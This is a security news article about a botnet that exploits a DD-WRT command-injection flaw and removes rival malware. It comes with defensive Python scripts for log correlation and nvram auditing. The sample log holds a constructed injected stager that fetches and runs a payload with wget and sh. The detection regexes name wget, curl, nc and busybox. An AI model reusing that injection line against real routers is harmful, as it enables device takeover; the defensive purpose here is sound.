C0xmo Botnet Hijacks DD‑WRT Routers, Destroys Rival Malware in the Process

A new wave of infections shows the C0xmo botnet exploiting a DD‑WRT firmware flaw while wiping out competing malware, raising fresh concerns for home‑router security.

Security researchers discovered that the C0xmo botnet is using a known DD‑WRT vulnerability to spread across home routers, simultaneously disabling rival malware strains and complicating remediation efforts.

Earlier this month, security analysts observed an unusual surge of traffic coming from a handful of consumer‑grade routers running the popular DD‑WRT firmware. Digging deeper, they found that the infamous C0xmo botnet had weaponised a long‑standing flaw in the router’s web interface to silently turn these devices into new footholds for its growing network.

The vulnerability – essentially an unauthenticated command injection in the router’s httpd service – has been publicly disclosed for years, yet many users still run outdated DD‑WRT builds. An attacker only needs to reach the web interface: that means the whole internet when remote administration is switched on, and otherwise the LAN side, for instance from an already‑compromised device sitting behind the router. Because embedded firmware of this kind typically runs its web server as root, a successful injection hands over the entire device. C0xmo’s operators appear to have crafted a lightweight stager that downloads a second‑stage binary and then opens a reverse shell to a command‑and‑control server. From there, the botnet can push additional modules, update its own code, or use the compromised router as a stepping‑stone to attack other devices on the same LAN.

What makes this campaign stand out, however, is the botnet’s aggressive behaviour toward other malware. In the same traffic logs, researchers noticed the sudden disappearance of a separate IoT‑focused trojan that had been seen on the same hardware just weeks earlier. Lab analysis showed that C0xmo’s installer deliberately checks for the presence of that rival’s files and, if found, overwrites or deletes them – effectively cleaning the router for its own use.

This “malware‑vs‑malware” strategy isn’t entirely new, but it’s rare to see it executed so cleanly on consumer networking gear. By eliminating competition, C0xmo not only secures more resources for itself but also makes detection harder: security tools tuned to the older threat simply stop firing, and a router that has gone quiet is easily mistaken for one that has been cleaned. The practical caveat is that the sudden silence of a known infection should be treated as a reason to look for its replacement, not as evidence of remediation; the fresh outbound connections from a re‑purposed router look like ordinary traffic unless something ties them back to the injection attempt that preceded them.
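As an added illustration of that detection gap (this is example code written for this article, not code from the researchers, from the DD‑WRT project or from the botnet), the following Python script correlates the two halves of the chain in a constructed log: an inbound request to the router’s web interface whose query string carries a shell separator followed by a download‑or‑execute token, and, within a short window, new outbound connections from the router to addresses outside its LAN. It also reports when the router’s traffic to a previously known indicator (a made‑up rival‑family address) stops after that moment, the purge pattern described above. The log format, the `/cgi-bin/example` path, every address and the two‑minute window are assumptions; the article does not name the real vulnerable endpoint and the script does not claim to know it.

```python
"""Correlate a command-injection attempt against a router's web interface
with the outbound connections that follow it.

Added example for this article. The log format, the /cgi-bin/example path,
every address and the rival-family indicator are constructed; none of it is
DD-WRT's real log format, the real vulnerable endpoint or real C0xmo IOCs.
"""
import ipaddress
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample: two log kinds, "httpd" (requests to the router's web
# server) and "conn" (connections the router itself opens). 192.0.2.1 is the
# router, 192.0.2.0/24 its LAN, 198.51.100.99 a made-up rival-family C2.
SAMPLE_LOGS = """\
2024-06-01T09:00:00Z conn src=192.0.2.1 dst=198.51.100.99 dport=23 proto=tcp
2024-06-02T09:00:00Z conn src=192.0.2.1 dst=198.51.100.99 dport=23 proto=tcp
2024-06-03T10:14:50Z httpd src=192.0.2.50 dst=192.0.2.1 uri=/index.asp
2024-06-03T10:15:02Z httpd src=203.0.113.45 dst=192.0.2.1 uri=/cgi-bin/example?host=1.1.1.1;wget%20http://198.51.100.7/s2%20-O%20/tmp/.s;sh%20/tmp/.s
2024-06-03T10:15:04Z conn src=192.0.2.1 dst=198.51.100.7 dport=80 proto=tcp
2024-06-03T10:15:06Z conn src=192.0.2.1 dst=198.51.100.7 dport=4444 proto=tcp
2024-06-03T10:16:00Z conn src=192.0.2.1 dst=192.0.2.2 dport=123 proto=udp
2024-06-04T09:00:00Z conn src=192.0.2.1 dst=198.51.100.7 dport=4444 proto=tcp
""".splitlines()

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<kind>httpd|conn) (?P<kv>.+)$")
# Shell separators that turn a parameter value into a second command...
SHELL_META = re.compile(r";|\|\||\||&&|`|\$\(")
# ...and the tools a stager uses to fetch and run a second stage.
STAGER_TOKENS = re.compile(r"\b(wget|curl|tftp|ftpget|busybox|chmod|sh|nc)\b")


def parse_line(line):
    """Turn one log line into a dict, or None if it is not in the sample format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"), "kind": m["kind"]}
    for field in m["kv"].split(" "):
        key, _, value = field.partition("=")
        rec[key] = value
    return rec


def is_injection_attempt(uri):
    """True when the decoded query string has a shell separator and a
    download/exec token: the shape of an injected stager, whatever the path."""
    query = unquote(uri).partition("?")[2]
    return bool(query) and bool(SHELL_META.search(query)) and bool(STAGER_TOKENS.search(query))


def is_outside_lan(ip, lan_nets):
    return not any(ipaddress.ip_address(ip) in net for net in lan_nets)


def analyze(lines, router_ip="192.0.2.1", lan_nets=("192.0.2.0/24",),
            rival_ioc="198.51.100.99", window=timedelta(minutes=2)):
    """Return one alert per injection attempt, listing the router's outbound
    connections to non-LAN hosts within `window` (second-stage fetch, reverse
    shell) and whether traffic to the rival indicator stopped afterwards."""
    records = [r for r in map(parse_line, lines) if r]
    nets = [ipaddress.ip_network(n) for n in lan_nets]
    conns = [r for r in records if r["kind"] == "conn" and r["src"] == router_ip]
    alerts = []
    for inj in records:
        if inj["kind"] != "httpd" or inj.get("dst") != router_ip or not is_injection_attempt(inj["uri"]):
            continue
        followups = [(c["dst"], int(c["dport"])) for c in conns
                     if inj["ts"] <= c["ts"] <= inj["ts"] + window and is_outside_lan(c["dst"], nets)]
        # "Rival went quiet": the router used to reach the older family's
        # indicator and never does again after the injection. That is a
        # symptom of replacement, not a sign the router has been cleaned.
        rival_before = any(c["dst"] == rival_ioc and c["ts"] < inj["ts"] for c in conns)
        rival_after = any(c["dst"] == rival_ioc and c["ts"] >= inj["ts"] for c in conns)
        alerts.append({
            "ts": inj["ts"].isoformat(),
            "attacker": inj["src"],
            "payload": unquote(inj["uri"]),
            "followups": followups,
            "rival_silent": rival_before and not rival_after,
        })
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOGS):
        print(f"[{alert['ts']}] injection from {alert['attacker']}: {alert['payload']}")
        for dst, port in alert["followups"]:
            print(f"    router then connected out to {dst}:{port}")
        if alert["rival_silent"]:
            print("    known rival-family traffic stopped here: look for a replacement, not a cleanup")
```

The point of the correlation is the ordering, not any single signature: the decoded query string would be missed by a tool that only inspects the raw URL, and the outbound connections on their own are indistinguishable from a firmware update check, so neither half is conclusive until it is tied to the other within the window.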

For everyday users, the takeaway is simple but urgent: if you rely on DD‑WRT, make sure you’re running a current build, and disable remote administration unless you absolutely need it; if you do need it, restrict it to HTTPS or SSH with a strong password rather than leaving the plain web interface open to the internet. Changing default passwords, applying firmware updates, and, where possible, switching to a router that still receives regular security patches all cut down the attack surface. A router you suspect is already compromised should not simply be updated in place: reflash it with a current build, reset it to factory defaults, and reconfigure it with new credentials before putting it back on the internet.
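One way to check those items against a router’s own configuration, as an added example written for this article rather than anything from the DD‑WRT project: the script below parses a saved `nvram show` dump (captured over SSH from a workstation, since the router itself has no Python) and reports the settings that expose the web interface or a shell to the WAN, together with the `nvram set ... && nvram commit` commands that close each one. The nvram variable names it looks for (`remote_management`, `remote_mgt_https`, `remote_mgt_ssh`, `remote_mgt_telnet`, `telnetd_enable`, `http_passwd`) are assumptions about DD‑WRT’s layout and should be confirmed against `nvram show` on the build in use; the sample dump is constructed, not captured from a real device.

```python
"""Audit a saved DD-WRT `nvram show` dump for WAN-facing management exposure.

Added example for this article, not DD-WRT project code. The variable names
in RULES are assumptions about DD-WRT's nvram layout; confirm them with
`nvram show` on your build before relying on the result.

Usage from a workstation:  ssh root@192.0.2.1 nvram show > dump.txt
                           python3 audit_nvram.py dump.txt
"""
import sys

# (nvram key, value that counts as exposed, why it matters, command that closes it)
RULES = [
    ("remote_management", "1", "web admin interface reachable from the WAN",
     "nvram set remote_management=0"),
    ("remote_mgt_ssh", "1", "SSH reachable from the WAN",
     "nvram set remote_mgt_ssh=0"),
    ("remote_mgt_telnet", "1", "telnet reachable from the WAN",
     "nvram set remote_mgt_telnet=0"),
    ("telnetd_enable", "1", "telnet daemon running (cleartext logins, no key auth)",
     "nvram set telnetd_enable=0"),
]

# Constructed sample dump: a router with remote web and SSH admin on, telnet
# running and no admin password set. Not captured from a real device.
SAMPLE_DUMP = """\
lan_ipaddr=192.0.2.1
remote_management=1
remote_mgt_https=0
remote_mgt_ssh=1
remote_mgt_telnet=0
sshd_enable=1
telnetd_enable=1
http_username=root
http_passwd=
size: 1234 bytes (30000 left)
"""


def parse_nvram(dump):
    """Parse key=value lines into a dict; lines without '=' (the size footer) are skipped."""
    settings = {}
    for line in dump.splitlines():
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def audit(dump):
    """Return a list of findings, each {"key", "why", "fix"}; an empty list means nothing flagged."""
    s = parse_nvram(dump)
    findings = []
    for key, exposed, why, fix in RULES:
        if s.get(key) == exposed:
            findings.append({"key": key, "why": why, "fix": f"{fix} && nvram commit"})
    # Remote web admin over plain HTTP sends the admin password across the
    # internet in the clear; if remote admin must stay on, force HTTPS.
    if s.get("remote_management") == "1" and s.get("remote_mgt_https") != "1":
        findings.append({"key": "remote_mgt_https",
                         "why": "remote web admin allowed over plain HTTP",
                         "fix": "nvram set remote_mgt_https=1 && nvram commit"})
    # The stored value is usually a hash, so the only judgement possible
    # offline is whether it is empty; an empty one lets anyone who reaches
    # the interface straight in.
    if s.get("http_passwd") == "":
        findings.append({"key": "http_passwd",
                         "why": "admin password is empty",
                         "fix": "set a unique password in the web UI, then nvram commit"})
    return findings


def main(argv):
    dump = open(argv[1]).read() if len(argv) > 1 else SAMPLE_DUMP
    findings = audit(dump)
    if not findings:
        print("no WAN-facing management exposure found")
    for f in findings:
        print(f"{f['key']}: {f['why']}\n    fix: {f['fix']}")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The non-zero exit status when anything is flagged is deliberate, so the script can gate a scheduled check; extend RULES with whatever additional keys your build exposes once you have confirmed their names.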

Researchers continue to monitor the botnet’s evolution, warning that its ability to both spread and purge competing code could signal a new era of self‑optimising malware ecosystems. As always, staying informed and keeping devices up‑to‑date remains the best line of defence.

Editorial note: Nishadil may use AI assistance for news drafting and formatting. Readers can report issues from this page, and material corrections are reviewed under our editorial standards.